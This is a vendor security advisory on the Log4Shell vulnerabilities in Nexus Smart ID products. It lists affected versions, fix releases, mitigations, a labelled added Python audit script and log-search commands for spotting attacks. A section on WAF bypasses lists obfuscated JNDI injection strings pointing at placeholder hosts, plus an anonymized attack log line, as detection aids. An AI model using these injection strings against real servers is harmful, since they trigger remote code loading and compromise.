Nexus' software components have new names:

Nexus PRIME -> Smart ID Identity Manager
Nexus Certificate Manager -> Smart ID Certificate Manager
Nexus Hybrid Access Gateway -> Smart ID Digital Access component
Nexus Personal -> Smart ID clients



General information

This message contains information related to the recently published remote code execution (RCE) vulnerability affecting Log4j: https://www.randori.com/blog/cve-2021-44228/ 

Log4j2 is an open-source, Java-based logging framework commonly incorporated into Apache web servers. According to public sources, Chen Zhaojun of Alibaba officially reported a Log4j2 remote code execution (RCE) vulnerability to Apache on Nov. 24, 2021.

This critical vulnerability, subsequently tracked as CVE-2021-44228 (aka “Log4Shell”), impacts all versions of Log4j2 from 2.0-beta9 to 2.14.1.

Subsequently, two additional CVEs were reported for Log4j: CVE-2021-45046, affecting version 2.15, and CVE-2021-45105, affecting version 2.16.

The Nexus Security team is currently investigating the impact of the Log4j remote code execution vulnerability (CVE-2021-44228) and the related CVE-2021-45046 and CVE-2021-45105, and determining the possible impact on our products.

Information about the update

Refer to the table in section "Nexus components" for the latest information for the components.

CVE-2021-45105

There was a new vulnerability (CVE-2021-45105) detected in Log4j, which has been fixed with version Log4j 2.17. Nexus has investigated the issue, and currently we see no indication that Nexus products are affected by this vulnerability.

Customers who still want to update to the latest Log4j version 2.17 can download the corresponding version from the official Log4j website and replace the version 2.16 JAR file with the new one.

Nexus will update Log4j again with the next regular release of the corresponding product versions.

Releases with fixed versions of the affected components:

  • Smart ID version 21.10.1 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
    You can find this version on the support portal, and release notes here: Release note Smart ID 21.10.1

  • Smart ID version 21.04.6 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
    You can find this version on the support portal, and release notes here: Release note Smart ID 21.04.6

  • Smart ID version 20.11.3 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
    You can find this version on the support portal, and release notes here: Release note Smart ID 20.11.3

  • Digital Access version 6.1.2 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, and it is packaged with Log4j 2.17.
    You can find this version on the support portal, and release notes here: Release note Digital Access component 6.1.2

  • Digital Access version 6.1.1 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
    You can find this version on the support portal, and release notes here: Release note Digital Access component 6.1.1

  • Smart ID Identity Manager (PRIME) version 3.12.14 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
    You can find this version on the support portal, and release notes here: Release note Smart ID Identity Manager 3.12.14

  • Smart ID Identity Manager (PRIME) version 3.11.5 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
    You can find this version on the support portal, and release notes here: Release note Smart ID Identity Manager 3.11.5

  • Smart ID Identity Manager (PRIME) version 3.10.30 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
    You can find this version on the support portal, and release notes here: Release note Smart ID Identity Manager 3.10.30


We will keep on updating this page on a regular basis, as soon as there is new information available.

Our engineering teams are working hard to develop fixes and to ensure that we provide the best possible fixes for you.

Since Friday evening, 2021-12-10, Nexus has had a dedicated incident team synchronizing our actions after the announcement of the Log4j CVE. This is to ensure that we work as effectively as possible during these first intensive days after such a critical CVE is released in the wild.

We can see tests and probing being performed on several customers, including our own SaaS environments, but have not yet seen or heard of any case where an attack on our products has actually been successful.

Factors like a WAF (Web Application Firewall) or egress control (a firewall or other method of controlling what traffic is allowed from the inside out) could be mitigating factors in some cases.

Nexus SaaS customers

If you are a Nexus SaaS (Software as a Service) customer, the mitigation and patching are performed by the SaaS delivery team. At this point in time, we have taken all necessary steps, and are awaiting our internal engineering teams to provide a permanent fix. We are monitoring the situation to further analyze any new changes to the CVE and the potential methods of exploiting it, to ensure security and stability in the environment.
 
Currently, the team is performing deeper analysis of attack patterns, to be able to tweak our service platform even further, for any future adaptations of this vulnerability. Our SaaS services are monitored 24/7/365 by our on-call rotation, and we have also updated our monitoring and routines to deal with this specific CVE. 

Nexus components

This list contains the components from Nexus and their respective affected versions. Each entry gives the component, its affected versions, and a comment.

Component: Smart ID Certificate Manager
Affected versions: None of the supported versions are affected
Comment: Does not use Log4j

Component: Nexus OCSP Responder
Affected versions: None of the supported versions are affected
Comment: Does not use Log4j

Component: Nexus Timestamp Server
Affected versions: None of the supported versions are affected
Comment: Does not use Log4j

Component: Smart ID Desktop / Mobile App
Affected versions: None of the supported versions are affected
Comment: Does not use Log4j

Component: Nexus Card SDK
Affected versions: None of the supported versions are affected
Comment: Does not use Log4j

Component: Smart ID Physical Access
Affected versions: None of the supported versions are affected
Comment: Does not use Log4j

Component: Smart ID Digital Access (previously named Hybrid Access Gateway – HAG)
Affected versions: Versions 6.0.5 and later could be affected if customers have configured Digital Access to use a syslog server for logging. Versions earlier than 6.0.5 are not affected. No version of HAG is affected.
  • Fix version 6.1.2 (Digital Access), released 2021-12-22
  • Fix version 6.1.1 (Digital Access), released 2021-12-16
Comment: When using syslog, Digital Access uses Log4j logging. We are still investigating this, as we have not yet been able to reproduce a successful attack. For all other purposes, an internal logging framework is used. This framework is not affected by CVE-2021-44228. Recommendation is to implement mitigation as described below, or upgrade to 6.1.1.

Component: Smart ID Identity Manager / PRIME
Affected versions:
  EOL WAR versions: 3.5, 3.6
  Supported WAR versions: 3.7, 3.8, 3.9, 3.10, 3.11, 3.12
  Supported Docker versions: 20.06, 20.11, 21.04, 21.10
  • Fix version 21.10.1 (Smart ID), released 2021-12-16
  • Fix version 21.04.6 (Smart ID), released 2021-12-16
  • Fix version 20.11.3 (Smart ID), released 2021-12-17
  • Fix version 3.12.14 (PRIME), released 2021-12-17
  • Fix version 3.11.5 (PRIME), released 2021-12-17
  • Fix version 3.10.30 (PRIME), released 2021-12-16
Comment: Recommendation is to implement mitigation as described below, or upgrade.

Component: Smart ID Self-Service
Affected versions:
  Supported WAR versions: 3.9, 3.10, 3.11, 3.12
  Supported Docker versions: 20.06, 20.11, 21.04, 21.10
Comment: Recommendation is to implement mitigation as described below, until Nexus has provided an official fix.

Component: Smart ID Messaging component – Hermod
Affected versions: None of the supported versions are affected
Comment: Hermod is shipped with the Log4j framework, in this case log4j-api, which is not affected. Hermod uses logback for its logging, not Log4j. See the reference in the documentation. Customers who are still using the older WAR versions of Hermod could have configured Log4j on their own. Please be aware of this and double-check your configuration.

If you have made any customized adaptations of your own logging, you need to investigate this with your teams internally. The information in this list is based on how Nexus ships our released versions to you.

Mitigation

Until a patch can be provided, we recommend that you follow the information available on the CVE.

Nexus engineering teams are working on a permanent fix for our products and aim to make it available to you as soon as possible. This fix will be based on Log4j 2.16.

Apache advises that if patching is not immediately possible, there is currently only one mitigation available, which is the one recommended by Apache. See this page for reference: Apache security page

Mitigations and applicable versions

  1. Remove the JndiLookup class from the classpath. To do this, enter this command:

     zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

     Applicable versions: All Log4j 2 versions
     This will provide a workaround for CVE-2021-44228.

  2. In PatternLayout in the logging configuration, replace Context Lookups like ${ctx:loginId} or $${ctx:loginId} with Thread Context Map patterns (%X, %mdc, or %MDC).
     Alternatively, instead of the replacement above, remove references to Context Lookups like ${ctx:loginId} or $${ctx:loginId} from the configuration where they originate from sources external to the application, such as HTTP headers or user input.

     Applicable versions: All Log4j versions prior to 2.17
     This will provide a workaround for CVE-2021-45105.

Performing this mitigation will prevent the vulnerability from working, as your application server will not perform the callback needed for the vulnerability to be successful.
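To verify that both mitigations have actually been applied, the following Python script (an added example, not part of this advisory and not Nexus product code) checks a log4j-core jar for the JndiLookup class and removes it with the same effect as the zip command above, and scans a PatternLayout for ${ctx:...} and $${ctx:...} Context Lookups and rewrites them to %X{...}. The jar it operates on (named log4j-core-2.14.1.jar) and the PatternLayout snippet are constructed inline for the demonstration; on a real system, point find_log4j_core_jars at the application's lib directory, stop the application before rewriting jars, and re-run jar_has_jndi_lookup afterwards to confirm the entry is gone.

```python
"""Audit helpers for the two mitigations above (added example, not Nexus code).

- jar_has_jndi_lookup / strip_jndi_lookup check for and remove the entry that
  `zip -q -d log4j-core-*.jar .../JndiLookup.class` deletes.
- find_context_lookups / rewrite_context_lookups locate ${ctx:key} and
  $${ctx:key} Context Lookups in a PatternLayout and rewrite them to %X{key}.
"""
import os
import re
import tempfile
import zipfile

# Entry path inside log4j-core jars, as given in the zip command above.
JNDI_LOOKUP_ENTRY = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

# ${ctx:key} and the deferred $${ctx:key} form.
_CTX_LOOKUP = re.compile(r"\$?\$\{ctx:([^}]+)\}")


def find_log4j_core_jars(root: str) -> list:
    """Walk root and return the paths matching the log4j-core-*.jar glob."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.startswith("log4j-core-") and name.endswith(".jar"):
                hits.append(os.path.join(dirpath, name))
    return sorted(hits)


def jar_has_jndi_lookup(jar_path: str) -> bool:
    """True while the jar still ships JndiLookup.class."""
    with zipfile.ZipFile(jar_path) as jar:
        return JNDI_LOOKUP_ENTRY in jar.namelist()


def strip_jndi_lookup(jar_path: str) -> bool:
    """Rewrite the jar without JndiLookup.class (the result of zip -d).
    Returns True if an entry was removed, False if there was nothing to do."""
    if not jar_has_jndi_lookup(jar_path):
        return False
    tmp_path = jar_path + ".tmp"
    with zipfile.ZipFile(jar_path) as src, zipfile.ZipFile(tmp_path, "w") as dst:
        for info in src.infolist():
            if info.filename != JNDI_LOOKUP_ENTRY:
                dst.writestr(info, src.read(info.filename))
    os.replace(tmp_path, jar_path)  # atomic swap within the same directory
    return True


def find_context_lookups(config_text: str) -> list:
    """Keys of every ${ctx:...} / $${ctx:...} lookup in a log4j2 config."""
    return _CTX_LOOKUP.findall(config_text)


def rewrite_context_lookups(config_text: str) -> str:
    """Replace each Context Lookup with the Thread Context Map pattern %X{key}."""
    return _CTX_LOOKUP.sub(r"%X{\1}", config_text)


def make_sample_jar(path: str) -> None:
    """Constructed stand-in for an affected log4j-core jar: the entry names
    are the real ones, the class bytes are placeholders."""
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        jar.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        jar.writestr(JNDI_LOOKUP_ENTRY, b"\xca\xfe\xba\xbe")


# Constructed PatternLayout that still uses Context Lookups (the weak setting).
SAMPLE_CONFIG = (
    '<PatternLayout pattern="%d %p user=${ctx:loginId} '
    'session=$${ctx:sessionId} %m%n"/>'
)


def demo() -> dict:
    """Run both audits on constructed input in a temp dir and return findings."""
    with tempfile.TemporaryDirectory() as root:
        jar = os.path.join(root, "lib", "log4j-core-2.14.1.jar")  # constructed name
        os.makedirs(os.path.dirname(jar))
        make_sample_jar(jar)
        found = find_log4j_core_jars(root)
        before = jar_has_jndi_lookup(jar)
        removed = strip_jndi_lookup(jar)
        after = jar_has_jndi_lookup(jar)
        with zipfile.ZipFile(jar) as j:
            remaining = sorted(j.namelist())
    return {
        "jars_found": len(found),
        "jndi_before": before,
        "removed": removed,
        "jndi_after": after,
        "remaining_entries": remaining,
        "ctx_keys": find_context_lookups(SAMPLE_CONFIG),
        "rewritten": rewrite_context_lookups(SAMPLE_CONFIG),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The jar is rewritten to a sibling temporary file and swapped in with os.replace, so a crash mid-way leaves the original jar untouched; the rewrite only affects CVE-2021-44228, and a rewritten jar still has to be replaced by a patched release when one is available.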

Further information

As an additional recommendation, we highly encourage you to investigate all other application servers (non Nexus software) you might have, that could use Log4j.

We also encourage you to perform log analysis of your application and network traffic and to take appropriate steps for mitigation.

This list contains some of the known applications that could be vulnerable to this CVE:

  • Apache Struts
  • Apache Solr
  • Apache Druid
  • Apache Flink
  • ElasticSearch
  • Flume
  • Apache Dubbo
  • Logstash
  • Kafka
  • Spring-Boot-starter-log4j2

Log4j RCE exploitation detection

You can use these commands and rules to search for exploitation attempts against the Log4j RCE vulnerability CVE-2021-44228.

The below commands are examples, and you will need to point the commands to your respective application log folder.

Nexus does not have access to the systems hosted by you, the customer (except for Nexus SaaS services, where this is handled by the service organization), so it is vital that you perform your own investigations to make sure that you have not been breached and are not subject to any form of data breach.

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in the folder /var/log and all sub folders:

sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' /var/log

This command searches for exploitation attempts in compressed files in the folder /var/log and all sub folders:

sudo find /var/log -name \*.gz -print0 | xargs -0 zgrep -E -i '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+'

Grep / Zgrep - Obfuscated variants

These commands also cover the obfuscated variants, but their output does not include the file name of the matching file.

This command searches for exploitation attempts in uncompressed files in the folder /var/log and all sub folders:

sudo find /var/log/ -type f -exec sh -c "cat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -i 'jndi:(ldap[s]?|rmi|dns):'" \;

This command searches for exploitation attempts in compressed files in the folder /var/log and all sub folders:

sudo find /var/log/ -name "*.gz" -type f -exec sh -c "zcat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -i 'jndi:(ldap[s]?|rmi|dns):'" \;

Yara file

YARA rules are a way of identifying malware (or other files) by creating rules that look for certain characteristics. YARA was originally developed by Victor Alvarez of VirusTotal and is mainly used in malware research and detection. It was developed with the idea of describing patterns that identify particular strains or entire families of malware.

On this GitHub page, you can find a YARA file that is tailor-made for this CVE (CVE-2021-44228).

Credit for the Grep and Yara files goes to Neo23x0 / Florian Roth. We share these with you, under the Detection Rule license (DRL) 1.1

WAF bypass methods

Many WAF (Web Application Firewall) vendors and providers have implemented WAF rules to be able to stop the traffic before it can reach the application itself.

There are methods to bypass some of the WAF rules, and these are some examples of methods that we would encourage you to search for in your logs, to see if your WAF might not have caught these requests.

Note: asdasd and xxxxxx are only placeholders; in a real scenario this would be the attacker's URL.

Example
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

This is an example of how this could look in an application log (real request, anonymized):

2021-12-12 05:54:07 0 ip.number.ip.ip 5f7288ab7f41d805 - - - endpoint.ip.number:443 https - GET / ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://111.111.1111.111:12344/Basic/Command/Base64/V2Ugd291bGQgbm90IHBvc3QgYW55dGhpbmcgbWFsaWNpb3VzIGhlcmUsIHNvIHRoaXMgaXMganVzdCBhbiBleGFtcGxlIHRleHQgY29udmVydGVkIHRvIEJBU0U2NCA6KQ== } host:ip.number.ip.ip:443 404

Disclaimer

Nexus has made effort to make this information accurate and reliable. However, the information, including the recommendations provided by Nexus, is provided "as is" without warranty of any kind. Nexus disclaims all warranties, either expressed or implied and Nexus shall in no event be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, which may arise as a result of your use, or inability to use, this information.

Latest update date of this article

2021-12-22 15:40 CET

